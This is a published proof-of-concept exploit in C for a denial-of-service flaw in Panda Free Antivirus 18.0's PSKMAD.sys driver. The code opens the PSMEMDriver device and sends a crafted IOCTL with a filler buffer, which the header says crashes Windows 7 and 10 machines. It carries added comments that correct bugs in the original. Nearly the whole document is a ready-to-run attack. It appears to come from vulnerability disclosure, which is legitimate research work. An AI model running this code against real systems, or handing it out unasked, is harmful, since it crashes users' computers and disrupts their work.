Panda Free Antivirus - 'PSKMAD.sys' Denial of Service

/*
# Exploit Title: Panda Cloud Antivirus Free - 'PSKMAD.sys' - BSoD - denial of service
# Date: 2017-04-29
# Exploit Author: Peter baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://download.cnet.com/Panda-Cloud-Antivirus-Free-Edition/3000-2239_4-10914099.html?part=dl-&subj=dl&tag=button&lang=en
# Version: 18.0
# Tested on: Windows 7 SP1 Pro x64, Windows 10 Pro x64
# CVE : requested
*/

#include "stdafx.h"
#include <stdio.h>
#include <Windows.h>
#include <winioctl.h>


#define DEVICE_NAME L"\\\\.\\PSMEMDriver"

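/* Path of the driver's control device (see DEVICE_NAME). The literal is a
 * wide string, so it is kept as LPCWSTR instead of being cast to LPCTSTR:
 * the original cast compiled in a non-UNICODE build but handed a UTF-16
 * buffer to CreateFileA, so the open silently failed with a misleading error. */
LPCWSTR FileName = DEVICE_NAME;

/*
 * Open the driver's device object for read/write access.
 *
 * @param devicePath  NUL-terminated wide device path, e.g. DEVICE_NAME.
 * @return The open handle, or INVALID_HANDLE_VALUE on failure (never NULL);
 *         callers must compare against INVALID_HANDLE_VALUE and may read
 *         GetLastError(). The caller owns the handle and must CloseHandle() it.
 */
HANDLE GetDeviceHandle(LPCWSTR devicePath) {
	/* No sharing, default security, no special flags: all that is needed is
	 * a plain handle on which DeviceIoControl can be issued. The original
	 * passed NULL/0 in swapped positions for the last two arguments; both
	 * are zero, so the call is unchanged. */
	return CreateFileW(devicePath,
		GENERIC_READ | GENERIC_WRITE,
		0,             /* dwShareMode */
		NULL,          /* lpSecurityAttributes */
		OPEN_EXISTING,
		0,             /* dwFlagsAndAttributes */
		NULL);         /* hTemplateFile */
}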

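/*
 * Entry point: opens the PSMEMDriver device, builds a 0x800-byte request
 * buffer and issues the IOCTL from the original PoC. The header comment
 * reports that this request crashes the machine (BSoD); if it does,
 * nothing after the DeviceIoControl call runs.
 *
 * Return value: 0 if the IOCTL was issued and returned success, 1 if the
 * device could not be opened, the buffer could not be allocated, or the
 * IOCTL call itself failed.
 */
int main()
{
	const DWORD ioctl_code = 0xb3702c38;   /* IOCTL code under test, as given in the PoC */
	const SIZE_T BufferSize = 0x800;
	HANDLE hFile = INVALID_HANDLE_VALUE;
	PVOID lpInBuffer = NULL;
	DWORD bytesReturned = 0;               /* DeviceIoControl takes LPDWORD, not PULONG64 */
	int rc = 1;

	printf("Trying the get the handle for the PSMEMDriver device.\r\n");

	hFile = GetDeviceHandle(FileName);
	if (hFile == INVALID_HANDLE_VALUE) {
		/* GetLastError() returns DWORD (unsigned long) -> %lX */
		printf("Can't get the device handle, no BSoD today. 0x%lX\r\n", GetLastError());
		return 1;
	}

	/* The driver only reads this buffer, so it does not need to be executable;
	 * PAGE_READWRITE replaces the original PAGE_EXECUTE_READWRITE. */
	lpInBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	if (lpInBuffer == NULL) {
		printf("VirtualAlloc() failed. \r\n");
		CloseHandle(hFile);   /* the original returned here without releasing the handle */
		return 1;
	}

	/* Buffer layout, byte-for-byte the same as the original PoC: two 32-bit
	 * words followed by 0x41 filler. The original produced it with two
	 * overlapping 64-bit stores at +0 and +4; the resulting bytes are the
	 * same. The author guessed the first word is a pool-header tag — that is
	 * not confirmed anywhere in this file. */
	((DWORD *)lpInBuffer)[0] = 0x542DF91B;
	((DWORD *)lpInBuffer)[1] = 0x42424242;
	RtlFillMemory((BYTE *)lpInBuffer + 8, BufferSize - 8, 0x41);

	/* nInBufferSize and the output arguments are left at 0/NULL exactly as in
	 * the original (which passed NULL for the sizes). Whether the zero length
	 * or the buffer contents is what the driver mishandles is not established
	 * by this code. The return value is now checked so a rejected request is
	 * reported instead of being indistinguishable from a driver that survived. */
	if (!DeviceIoControl(hFile, ioctl_code, lpInBuffer, 0, NULL, 0, &bytesReturned, NULL)) {
		printf("DeviceIoControl() failed. 0x%lX\r\n", GetLastError());
	} else {
		rc = 0;
	}

	/* Only reached if the machine survives the request. */
	printf("Cleaning up.\r\n");
	/* MEM_RELEASE requires dwSize == 0. The original passed sizeof(lpInBuffer),
	 * which makes VirtualFree fail with ERROR_INVALID_PARAMETER and leaves the
	 * mapping in place. */
	if (!VirtualFree(lpInBuffer, 0, MEM_RELEASE)) {
		printf("VirtualFree() failed. 0x%lX\r\n", GetLastError());
	}
	CloseHandle(hFile);
	printf("Resources freed up.\r\n");
	return rc;
}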
            
